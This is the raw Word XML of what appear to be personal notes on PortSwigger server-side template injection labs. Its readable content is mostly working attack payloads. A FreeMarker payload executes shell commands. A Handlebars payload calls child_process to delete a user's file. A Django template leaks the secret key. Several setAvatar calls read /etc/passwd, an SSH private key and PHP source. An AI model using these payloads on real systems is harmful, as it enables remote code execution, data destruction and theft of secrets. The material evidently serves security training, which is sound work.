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762B4" w14:textId="7A94C694" w:rsidR="0066500B" w:rsidRDefault="003C3907">
      <w:r>
        <w:t xml:space="preserve">Content </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>preview :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7DFB3264" w14:textId="77777777" w:rsidR="003C3907" w:rsidRDefault="003C3907"/>
    <w:p w14:paraId="49B80BA1" w14:textId="01180D20" w:rsidR="003C3907" w:rsidRDefault="003C3907">
      <w:r w:rsidRPr="003C3907">
        <w:t>&lt;#assign ex="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C3907">
        <w:t>freemarker.template</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3907">
        <w:t>.utility.Execute"?new</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3907">
        <w:t>()&gt; ${ ex("id") }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58066309" w14:textId="77777777" w:rsidR="003C3907" w:rsidRDefault="003C3907"/>
    <w:p w14:paraId="3AEDA112" w14:textId="5D86FD57" w:rsidR="003C3907" w:rsidRDefault="003C3907">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74E45133" wp14:editId="7C30C084">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="153074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5005" w14:textId="77777777" w:rsidR="00711907" w:rsidRDefault="00711907"/>
    <w:p w14:paraId="4BD51F40" w14:textId="77777777" w:rsidR="00711907" w:rsidRDefault="00711907"/>
    <w:p w14:paraId="73C6680D" w14:textId="77777777" w:rsidR="00711907" w:rsidRPr="00711907" w:rsidRDefault="00000000" w:rsidP="00711907">
      <w:pPr>
        <w:spacing w:after="150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</w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00711907" w:rsidRPr="00711907">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="36"/>
            <w:sz w:val="48"/>
            <w:szCs w:val="48"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>Server-side template injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00711907" w:rsidRPr="00711907"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  <w:t> in an unknown language with a documented exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497510B1" w14:textId="77777777" w:rsidR="00711907" w:rsidRDefault="00711907"/>
    <w:p w14:paraId="1FBE1792" w14:textId="77777777" w:rsidR="00711907" w:rsidRDefault="00711907"/>
    <w:p w14:paraId="256ECBF0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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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wrtz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{</w:t>
      </w:r>
      <w:proofErr w:type="gram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{#with "s" as |string|}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26927A39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{{#with "e"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C67B3D9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{{#with split as |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conslist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|}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B6F31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{{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this.pop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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619558BB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{{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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this.push</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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(lookup 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string.sub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"constructor")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3979E509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{{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this.pop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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145461B7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{{#with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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string.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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as |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codelist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|}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04355BFC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    {{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this.pop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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E16965C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    {{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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this.push</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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"return require('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child_process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').exec('rm /home/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carlos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/morale.txt');"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139309A9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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                {{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this.pop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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE661C1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    {{#each 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conslist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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4340D5EC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        {{#with (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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string.sub.apply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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codelist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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)}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B8A0A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            {{this}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CB6A2A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        {{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B4A082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    {{/each}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597E4722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    {{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7BCE1F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    {{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149F753F" w14:textId="77777777" w:rsidR="00711907" w:rsidRPr="00711907" w:rsidRDefault="00711907" w:rsidP="00711907">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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 xml:space="preserve">    {{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E5F57B" w14:textId="4461C0A3" w:rsidR="00711907" w:rsidRDefault="00711907" w:rsidP="00711907">
      <w:pPr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 w:rsidRPr="00711907"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  <w:t>{{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B169C19" w14:textId="77777777" w:rsidR="00711907" w:rsidRDefault="00711907" w:rsidP="00711907">
      <w:pPr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</w:p>
    <w:p w14:paraId="5671C005" w14:textId="77777777" w:rsidR="00A30D42" w:rsidRDefault="00A30D42" w:rsidP="00711907">
      <w:pPr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</w:p>
    <w:p w14:paraId="0E498ECB" w14:textId="77777777" w:rsidR="00A30D42" w:rsidRDefault="00A30D42" w:rsidP="00711907">
      <w:pPr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</w:p>
    <w:p w14:paraId="57662396" w14:textId="77777777" w:rsidR="00A30D42" w:rsidRDefault="00A30D42" w:rsidP="00711907">
      <w:pPr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</w:p>
    <w:p w14:paraId="3C69D4CF" w14:textId="6C72AC8D" w:rsidR="00711907" w:rsidRDefault="00F1329B" w:rsidP="00711907">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        </w:rPr>
        <w:t>{{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        </w:rPr>
        <w:t>settings.SECRET</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        </w:rPr>
        <w:t>_KEY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D646C1" w14:textId="77777777" w:rsidR="00711907" w:rsidRDefault="00711907" w:rsidP="00711907"/>
    <w:p w14:paraId="7B2B64F0" w14:textId="77777777" w:rsidR="00AB22EE" w:rsidRDefault="00AB22EE" w:rsidP="00711907"/>
    <w:p w14:paraId="17F9C9BC" w14:textId="77777777" w:rsidR="00AB22EE" w:rsidRDefault="00AB22EE" w:rsidP="00711907"/>
    <w:p w14:paraId="3E286B86" w14:textId="77777777" w:rsidR="00AB22EE" w:rsidRDefault="00AB22EE" w:rsidP="00711907"/>
    <w:p w14:paraId="52CD1CFF" w14:textId="47CFE3E1" w:rsidR="00AB22EE" w:rsidRDefault="00AB22EE" w:rsidP="00711907">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        </w:rPr>
        <w:t>user.setAvatar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        </w:rPr>
        <w:t>('/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        </w:rPr>
        <w:t>passwd','image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        </w:rPr>
        <w:t>/jpg')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3B7DBE" w14:textId="77777777" w:rsidR="00AB22EE" w:rsidRDefault="00AB22EE" w:rsidP="00711907">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="5C5C5B"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2EDE03" w14:textId="77777777" w:rsidR="00AB22EE" w:rsidRPr="00AB22EE" w:rsidRDefault="00AB22EE" w:rsidP="00AB22EE">
      <w:p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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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user.setAvatar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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('/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/User.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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','image/jpg')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493685B3" w14:textId="77777777" w:rsidR="00AB22EE" w:rsidRDefault="00AB22EE" w:rsidP="00711907"/>
    <w:p w14:paraId="7F85587D" w14:textId="77777777" w:rsidR="00AB22EE" w:rsidRPr="00AB22EE" w:rsidRDefault="00AB22EE" w:rsidP="00AB22EE">
      <w:p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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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user.setAvatar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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('/etc/passwd')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549F222B" w14:textId="77777777" w:rsidR="00AB22EE" w:rsidRDefault="00AB22EE" w:rsidP="00AB22EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="450" w:lineRule="atLeast"/>
        <w:ind w:left="720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14:paraId="782A79A2" w14:textId="60216967" w:rsidR="00AB22EE" w:rsidRDefault="00AB22EE" w:rsidP="00AB22EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="450" w:lineRule="atLeast"/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</w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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user.setAvatar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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('/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/.ssh/id_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB22EE"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  <w:t>','image/jpg')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF63CD8" w14:textId="77777777" w:rsidR="00AB22EE" w:rsidRDefault="00AB22EE" w:rsidP="00AB22EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C81E0BA" w14:textId="77777777" w:rsidR="00910E64" w:rsidRDefault="00AB22EE" w:rsidP="00AB22EE">
      <w:p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2E4AB952" wp14:editId="02B43DE8">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="900342256" name="Picture 2" descr="A person in a black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42256" name="Picture 2" descr="A person in a black shi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E2CD0" w14:textId="77777777" w:rsidR="00910E64" w:rsidRDefault="00910E64" w:rsidP="00AB22EE">
      <w:p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</w:p>
    <w:p w14:paraId="623F79EB" w14:textId="1D974B3D" w:rsidR="00AB22EE" w:rsidRPr="00AB22EE" w:rsidRDefault="00AB22EE" w:rsidP="00AB22EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="450" w:lineRule="atLeast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03B44899" wp14:editId="15EB6642">
            <wp:extent cx="5731510" cy="3796030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1047400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22EE" w:rsidRPr="00AB22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80438"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED5A1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C0E3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD248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B96B8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA3A2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1832884">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1296371954">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="126394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C9F"/>
    <w:rsid w:val="00120B5D"/>
    <w:rsid w:val="002F335D"/>
    <w:rsid w:val="003C3907"/>
    <w:rsid w:val="0049531F"/>
    <w:rsid w:val="00506E0F"/>
    <w:rsid w:val="0066500B"/>
    <w:rsid w:val="00711907"/>
    <w:rsid w:val="00910E64"/>
    <w:rsid w:val="00A30D42"/>
    <w:rsid w:val="00AB22EE"/>
    <w:rsid w:val="00B31E91"/>
    <w:rsid w:val="00D25C9F"/>
    <w:rsid w:val="00F1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85B4E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D3521A50-55F2-4FA5-9040-E7330DB20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E0F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00506E0F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E0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6E0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E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E0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E0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E0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E0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E0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E0F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E0F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6E0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E0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E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E0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E0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E0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E0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6E0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6E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506E0F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E0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506E0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506E0F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00506E0F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00506E0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06E0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506E0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06E0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E0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E0F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06E0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06E0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06E0F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506E0F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506E0F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6E0F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71190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B22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48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ortswigger.net/web-security/server-side-template-injection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JAYAPRAWIN BLASTER</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>JAYAPRAWIN BLASTER</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-22T11:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-23T15:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>